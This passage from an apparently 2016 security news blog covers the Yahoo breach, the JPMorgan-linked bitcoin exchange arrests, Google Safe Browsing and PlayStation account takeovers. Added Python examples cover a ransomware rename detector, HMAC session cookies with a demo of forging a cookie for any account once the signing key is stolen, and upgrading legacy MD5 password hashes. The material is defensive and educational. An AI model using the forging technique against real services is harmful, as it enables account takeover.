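    # pid 3000 is the user renaming a few photos by hand, one per second
    + [_ev(200.0 + i, 3000, "explorer.exe", "rename",
           f"{DOCS}\\IMG_{i}.jpeg", f"{DOCS}\\IMG_{i}.jpg") for i in range(3)]
)


def extension(path):
    """Lower-cased extension of a Windows path, '' if it has none."""
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def ransomware_suspects(events, window=10.0, min_files=10):
    """Return {pid: (max_distinct_files, [new extensions])} for processes that
    change the extension of at least `min_files` distinct files within any
    `window`-second span. Ordinary saves and one-off renames fall below the bar."""
    renames = defaultdict(list)  # pid -> [(ts, original path, new extension)]
    for e in events:
        if e["op"] == "rename" and extension(e["src"]) != extension(e["dst"]):
            renames[e["pid"]].append((e["ts"], e["src"], extension(e["dst"])))

    suspects = {}
    for pid, rs in renames.items():
        rs.sort()
        best, start = 0, 0
        for end in range(len(rs)):           # sliding window over timestamps
            while rs[end][0] - rs[start][0] > window:
                start += 1
            best = max(best, len({r[1] for r in rs[start:end + 1]}))
        if best >= min_files:
            suspects[pid] = (best, sorted({r[2] for r in rs}))
    return suspects


if __name__ == "__main__":
    print(ransomware_suspects(EVENTS))
```

A production rule would add the other classic signals (writes of high-entropy data over existing files, deletion of volume shadow copies, ransom-note files dropped into every directory) and would act on the first threshold crossing rather than after the fact, since the point of “detection in seconds” is to kill the process before it finishes the directory.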

The Windows Defender ATP in Windows 10 Anniversary Update allows companies to detect attacks that have impacted others. The service combines security events collected from the machines with cloud analytics and should be able to detect signs of attacks and alert the enterprise security team. Details on ransomware attacks would be available in the Windows Defender ATP console, allowing respondents to determine where it might be moving next in the network.

The aforementioned whitepaper details even more of the security enhancements that Microsoft packed inside Windows 10 Anniversary Update. To take advantage of them, the tech company says, users should update their devices as soon as possible.

Sunday, 13 November 2016


The breach was disclosed in September and Yahoo blamed state-sponsored attackers, a claim that was challenged by some experts who instead said a criminal outfit was behind the attack and may have sold some of the data to an Eastern European government.

The SEC filing also contains a confirmation from Yahoo that Verizon’s multibillion-dollar acquisition of Yahoo’s core business could be in jeopardy, and that Verizon could seek to terminate or renegotiate the terms of the sale. Verizon executive vice president Marni Walden said at a Wall Street Journal event 10 days ago that it was still moving forward with the acquisition, but according to the Journal, stopped short of saying that it would not put a halt to the deal if necessary. “What we have to be careful about is what we don’t know,” Walden said. “We’re not going to jump off a cliff blindly so we need to have more information before we can determine, but strategically the deal still makes a lot of sense to us.”

Yahoo said that claims in July from hackers that 200 million account credentials were available for purchase on an underground hacker forum prompted a deeper investigation into the security of its network and a broader look at the 2014 intrusion.

“In addition, the forensic experts are currently investigating certain evidence and activity that indicates an intruder, believed to be the same state-sponsored actor responsible for the Security Incident, created cookies that could have enabled such intruder to bypass the need for a password to access certain users’ accounts or account information,” Yahoo told the SEC. It added that on Monday, law enforcement shared evidence provided by a hacker that is allegedly legitimate Yahoo account information; Yahoo said it is investigating. Yahoo told the SEC that the stolen information included names, email addresses, telephone numbers, dates of birth, hashed passwords and encrypted and unencrypted security questions and answers.
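Yahoo's filing says the intruder “created cookies” that bypassed the password check. A session cookie is normally a signed token: whoever holds the signing key can mint a valid one for any account, no password needed, and the only remedy is to rotate the key and make every user log in again. The Python below is an added illustration of that mechanism using an HMAC-SHA256 token. It is a hypothetical scheme written for this page, not Yahoo's cookie format, and the keys, user names and fixed clock are constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_cookie(user, key, ttl=3600, now=None):
    """Issue base64(payload).base64(HMAC-SHA256(key, payload)) for `user`."""
    now = time.time() if now is None else now
    payload = json.dumps({"sub": user, "exp": int(now + ttl)},
                         separators=(",", ":")).encode()
    sig = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(sig)}"


def verify_cookie(cookie, key, now=None):
    """Return the user name if the cookie is correctly signed and unexpired, else None."""
    now = time.time() if now is None else now
    try:
        payload_b64, sig_b64 = cookie.split(".", 1)
        payload = _unb64(payload_b64)
        expected = hmac.new(key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig_b64)):  # constant-time
            return None
        claims = json.loads(payload)
        if claims["exp"] < now:
            return None
        return claims["sub"]
    except (ValueError, KeyError, TypeError):
        return None


def demo():
    """Show what a stolen signing key buys an attacker and what key rotation fixes."""
    key_v1 = secrets.token_bytes(32)
    now = 1_480_000_000  # fixed clock so the demo is reproducible
    legit = mint_cookie("alice", key_v1, now=now)

    # Intruder holding key_v1 needs no password: a cookie for any account is
    # simply mint_cookie(<victim>, stolen_key), indistinguishable from a real one.
    forged = mint_cookie("bob", key_v1, now=now)

    # Without the key, editing the payload breaks the signature.
    tampered = mint_cookie("mallory", key_v1, now=now).split(".")[0] + "." + legit.split(".")[1]

    # Rotating the key invalidates every outstanding cookie, forged or legitimate.
    key_v2 = secrets.token_bytes(32)

    return {
        "legit_ok": verify_cookie(legit, key_v1, now=now) == "alice",
        "forged_ok": verify_cookie(forged, key_v1, now=now) == "bob",
        "tampered_ok": verify_cookie(tampered, key_v1, now=now) is not None,
        "after_rotation_ok": verify_cookie(forged, key_v2, now=now) is not None,
        "expired_ok": verify_cookie(legit, key_v1, now=now + 7200) is not None,
    }


if __name__ == "__main__":
    print(demo())
```

The practical lesson is that a cookie-forging intrusion is a key-compromise incident, not a credential incident: resetting passwords does nothing until the signing key is rotated and, ideally, the server also keeps a per-user “sessions issued before this time are invalid” timestamp so that a single account can be revoked without logging everyone out.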

Yahoo reaffirmed earlier statements that no payment card data or bank account information was stolen; that information, Yahoo said, was not stored on the systems that were accessed. News of the Yahoo breach surfaced at a time when large-scale password dumps were being disclosed in waves. Most of the Yahoo passwords were hashed using bcrypt, but some were secured with MD5, a long-outdated algorithm that is considered unsafe and has been deprecated in many corners. Security company Venafi said in late September that data collected from its internal certificate reputation service indicates that Yahoo’s cryptographic practices were a mixed bag of outdated hashes and self-signed certificates, none of which are entirely secure. Beyond simply the use of SHA1 and MD5, for example, Venafi said that it found a wildcard certificate with a five-year expiration date, much longer than the usual 12 to 18 months.
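Yahoo's mix of bcrypt and MD5 is the usual legacy-migration problem: a site cannot rehash an MD5 password until the user next logs in, but it can immediately wrap the stored MD5 digest inside a slow, salted hash so that a stolen table is no longer crackable at MD5 speed. The Python below is an added example of that “wrap the legacy digest” pattern together with rehash-on-login. It is not Yahoo's code; bcrypt is not in Python's standard library, so `hashlib.pbkdf2_hmac` stands in for the slow hash, and the record-format tags, iteration count and passwords are constructed for the example.

```python
import hashlib
import hmac
import os

ITER = 50_000  # constructed for the example; tune so a hash costs ~100 ms in production


def md5_hex(password: str) -> str:
    """Legacy unsalted MD5, the format the breach exposed (never use for new records)."""
    return hashlib.md5(password.encode()).hexdigest()


def slow_hash(secret: bytes, salt: bytes) -> bytes:
    """Stand-in for bcrypt: a salted, iterated, deliberately slow hash."""
    return hashlib.pbkdf2_hmac("sha256", secret, salt, ITER)


def store_new(password: str) -> str:
    """Record format for passwords we actually know: pbkdf2$<salt>$<digest>."""
    salt = os.urandom(16)
    return "pbkdf2$" + salt.hex() + "$" + slow_hash(password.encode(), salt).hex()


def wrap_legacy(md5_record: str) -> str:
    """Offline upgrade of an MD5 row without knowing the password:
    the slow hash is applied to the MD5 digest itself."""
    salt = os.urandom(16)
    return "pbkdf2-md5$" + salt.hex() + "$" + slow_hash(md5_record.encode(), salt).hex()


def classify(record: str) -> str:
    if record.startswith("pbkdf2$"):
        return "pbkdf2"
    if record.startswith("pbkdf2-md5$"):
        return "wrapped-md5"
    if len(record) == 32 and all(c in "0123456789abcdef" for c in record):
        return "md5"
    return "unknown"


def verify(password: str, record: str):
    """Return (ok, replacement_record). replacement_record is non-None when the
    login succeeded against a legacy form and the row should be rewritten now
    that the cleartext is in hand."""
    kind = classify(record)
    if kind == "md5":
        ok = hmac.compare_digest(md5_hex(password), record)
        return ok, (store_new(password) if ok else None)
    if kind == "wrapped-md5":
        _, salt_hex, digest_hex = record.split("$")
        calc = slow_hash(md5_hex(password).encode(), bytes.fromhex(salt_hex)).hex()
        ok = hmac.compare_digest(calc, digest_hex)
        return ok, (store_new(password) if ok else None)
    if kind == "pbkdf2":
        _, salt_hex, digest_hex = record.split("$")
        calc = slow_hash(password.encode(), bytes.fromhex(salt_hex)).hex()
        return hmac.compare_digest(calc, digest_hex), None
    return False, None


if __name__ == "__main__":
    legacy = md5_hex("correct horse")          # what the old table held
    wrapped = wrap_legacy(legacy)              # what it should hold tonight
    print(classify(legacy), classify(wrapped))
    ok, upgraded = verify("correct horse", wrapped)
    print(ok, classify(upgraded))              # True pbkdf2
```

Two caveats a practitioner would add: wrapping does not add a salt to the inner MD5, so two users with the same password still share the same inner digest and the wrap must be done per row with its own salt, and the `wrapped-md5` rows should be counted and reported until they reach zero, because the disclosure obligations in a breach are very different for “all bcrypt” than for “mostly bcrypt”.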

It added that 27 percent of certificates on external Yahoo sites were in place since January 2015 and that fewer than 3 percent were issued in the previous 90 days. Weakened certificates have been attacked in the past to redirect traffic or pose as a Yahoo site and steal credentials or intercept traffic. Congress soon interjected and wrote a letter to CEO Marissa Mayer demanding to know why it took Yahoo two years to disclose the attack, expressing dismay that users’ data has been exposed during that period of time. Vermont Senator Patrick Leahy called the situation “unacceptable.”

The breach, Yahoo told the SEC, has also given birth to 23 class-action lawsuits filed against the company making claims of harm and seeking damages and relief. Yahoo said it has spent $1 million in the third quarter of this year related to its breach investigation, but said the breach did not materially impact its business or cash flow for the quarter. Yahoo also admitted in its filing that it does not have cybersecurity liability insurance.

See more at: Yahoo Tells SEC It Knew About Data Breach in 2014

Sixth Individual Arrested in Connection with Bitcoin Exchange, Links to JPMorgan Hack

A Florida man is the latest person to be charged in connection with alleged illegal activities associated with a now defunct unlicensed bitcoin exchange. Riccardo Hill, a resident of Brandon, Florida, was charged with conspiring to operate an unlicensed money transmitting business. He was released Thursday on a $75,000 bond following a court appearance in Manhattan.

Hill, 38, was arrested in October. He is the ninth person to be arrested following the investigation into the JPMorgan data breach that was disclosed in 2014. Prosecutors claim that the exchange was owned by Gery Shalon, an Israeli charged with masterminding the hacks that breached JPMorgan and other companies.

Shalon and Ziv Orenstein, another Israeli, were arrested in Israel in July 2015. They were extradited to the US and pleaded not guilty to a hacking and fraud scheme including but not limited to JPMorgan. Prosecutors said the scheme dated back to 2007 and compromised the personal information of more than 100 million people.

A third individual, Joshua Aaron from Florida, is also wanted in connection with these charges. Aaron is believed to have fled to Russia, which he frequently visited. This has led to some suggestions that the actual hacker (rather than the orchestrators) of the JPMorgan hack and others may be Russian. Last month Bloomberg reported that Aaron had been located in Russia, but is no longer welcome there. "The only American suspect named in the largest known hack of Wall Street is negotiating his return to the U.S. from a detention cell in Russia, where he's no longer welcome."

The investigation into the JPMorgan breach led to Shalon, and Shalon led to the exchange, which seems to have been used as a laundering facility for other criminal activities, including the proceeds of ransomware. It is possible that the personal details stolen in the JPMorgan and other hacks helped facilitate some of this illegal activity. The exchange was operated by Anthony Murgio, also from Florida. He and four others associated with it were arrested around the same time as Shalon. At that time the FBI stated: "Murgio and his co-conspirators knowingly enabled the criminals responsible for those attacks to receive the proceeds of their crimes, yet, in violation of federal anti-money laundering laws, Murgio never filed any suspicious activity reports regarding any of the transactions."

The latest charge against Hill claims that he was employed as a finance support manager and business development consultant for the unlicensed bitcoin exchange. The complaint against Hill claims that he and others profited from numerous bitcoin transactions conducted on behalf of victims of schemes involving ransomware.

Wednesday, 9 November 2016

Google to Label Malware Sites with 30-Day Full Page Alerts

Google will slap repeat malware offenders with a 30-day red alert for website visitors.
Chrome, Firefox and Safari will display a full page 'deceptive' warning for those websites that appear to intentionally spread malware, unwanted software or phishing pages.
Further, they’ll be blocked from the Safe Browsing review process, to prevent nefarious webmasters from gaming the system.
Google normally allows a review process if a site is branded as harmful. An operator can ask Google to review the site and remove the warning once it has been confirmed that the offending issue has been rectified.
However, Google has observed that some websites will cease harming users for long enough to have the warnings removed, and will then revert to harmful activity.
“Repeat Offenders are websites that repeatedly switch between compliant and policy-violating behavior for the purpose of having a successful review and having warnings removed,” said Brooke Heinichen, of the Google Safe Browsing Team. “Once Safe Browsing has determined that a site is a Repeat Offender, the webmaster will be unable to request additional reviews via the Search Console for 30 days, and warnings will continue to show to users. When a site is established as a Repeat Offender, the webmaster will be notified via email to their registered Search Console email address.”
Websites that are hacked will not be classified as Repeat Offenders; only sites that purposefully post harmful content will be subject to the policy.

Rash of PlayStation Hacks Hits UK Gamers

Widespread reports of stolen PlayStation Network accounts, especially in the UK, have started appearing in support forums.
PlayStation gamers have taken to the Sony Twitter support handle and to Reddit in droves over the past few weeks to report that their accounts have been hacked. In some cases, users say the compromises resulted in fraudulent charges; mostly, they complain that their account IDs were changed so they can no longer log in.
Sony has yet to issue an official response, but it’s been replying to customer tweets directing users to a generic contact form.
The compromises could stem from phishing, or from credential re-use (a breach of another site yielded passwords that also work for PSN), possibly replayed at scale by a botnet, the pattern known as credential stuffing.
The other possibility is a hack of the platform itself, which is not unprecedented. The 2011 PlayStation hack exposed the personal information of the entire PSN user base, 77 million people, including users' account names, dates of birth, email addresses and credit card details. Sony linked that intrusion to Anonymous, although the group denied responsibility, and the incident forced the company to shut down its entire system for almost a month.
In April, five years after the massive hack, Sony finally implemented two-factor authentication for the PSN. Encouragingly, 2FA has alerted some users to attempts on their accounts, since the second-factor prompt only arrives once an attacker has already supplied the correct password. One person said on Reddit: “I've had my psn account hacked twice. Both times I managed to regain control of it. Then Sony released two factor sign in. Since Saturday I've gotten I think eight requests for the code. Someone is trying again and has somehow gotten my password.”